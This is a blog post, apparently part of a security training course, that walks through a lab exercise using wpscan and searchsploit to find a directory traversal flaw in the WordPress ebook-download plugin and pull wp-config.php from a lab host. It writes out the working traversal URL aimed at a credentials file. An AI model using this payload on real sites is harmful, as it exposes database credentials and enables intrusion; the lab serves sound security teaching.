Powered by Blogger.
Home » » Module 08: Web Application Penetration Testing Methodology 5

Module 08: Web Application Penetration Testing Methodology 5

Written By AKADEMY on Thursday, July 4, 2019 | 10:10 PM

Exercise 5: Exploiting Directory Traversal Vulnerability in WordPress Application

Scenario

Directory traversal allows attackers to access restricted directories including application source code, configuration, and critical system files, and execute commands outside of the webserver's root directory. Attackers usually manipulate variables that reference files with “dot-dot-slash (../)” sequences and its variations to access these restricted directories.
As a penetration tester, you need to be aware of how to identify directory traversal vulnerability and pentest it, to gain access to sensitive information.
In this lab, you will learn how to:
i. Enumerate WordPress plugins using wpscan
ii. Identify vulnerabilities using SearchSploit
iii. Exploit the vulnerability to download sensitive files
Lab Duration20 Minutes
  1. Click Kali Linux (External Network).
    If Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
    Screenshot
  2. Type root in the Username field and click Next.
    Screenshot
  3. Type toor in the password field and click Sign In.
    Screenshot
  4. In this lab, we are going to perform penetration testing on a wordpress website with the URL http://172.19.19.18/wordpress.
    Since we do not have any information regarding the website, let us use wpscan to extract the wordpress plugin details, hoping there is a vulnerability that allows us to gain access to its contents.
  5. Launch a command line terminal, type wpscan --url http://172.19.19.18/wordpress --enumerate p and press Enter.
    A notification appears asking you to update wpscan. Type N and press Enter to skip the update.
    This begins plugin enumeration on the wordpress website.
    Screenshot
  6. WPScan enumerates the plugins and displays them as shown in the screenshot below.
    In this lab, we will be focusing on the ebook-download plugin.
    Screenshot
  7. Now, we shall search for publicly available exploits for the plugin ebook-download.
    Type searchsploit ebook download 1.1 and press Enter.
    Screenshot
  8. Searchsploit returns a result related to ebook-download as shown in the screenshot below.
    The vulnerability discovered is directory traversal and the exploit ID is 39575.
    Screenshot
  9. We shall now copy the exploit to root directory. To copy, type searchsploit -m 39575 and press Enter.
    A copy of the exploit gets stored in the root directory as shown in the screenshot below.
    Screenshot
  10. Type cat 39575.txt and press Enter to view the proof of concept written in the exploit text file.
    Screenshot
  11. It is observed that directory traversal vulnerability is present in filedownload.php.
    We shall now use this URL to download the wp-config.php file.
    Screenshot
  12. Since the URL of wordpress site is http://172.19.19.18/wordpress, the directory traversal URL we are going to enter in this lab will be http://172.19.19.18/wordpress/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php.
    So, launch Firefox web browser, type http://172.19.19.18/wordpress/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php and press Enter.
    Screenshot
  13. Opening wp-config.php dialog-box appears, click Save File.
    Screenshot
  14. A window appears displaying the root directory. Click on the Save button.
    This downloads the config file to root directory.
    Screenshot
  15. You will observe the downloaded wp-config.php file in the root directory as shown in the screenshot below, inferring that the directory traversal vulnerability has been successfully exploited.
    Screenshot
In this lab, you have learned how to:
i. Enumerate WordPress plugins using wpscan
ii. Identify vulnerabilities using SearchSploit
iii. Exploit the vulnerability to download sensitive files
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT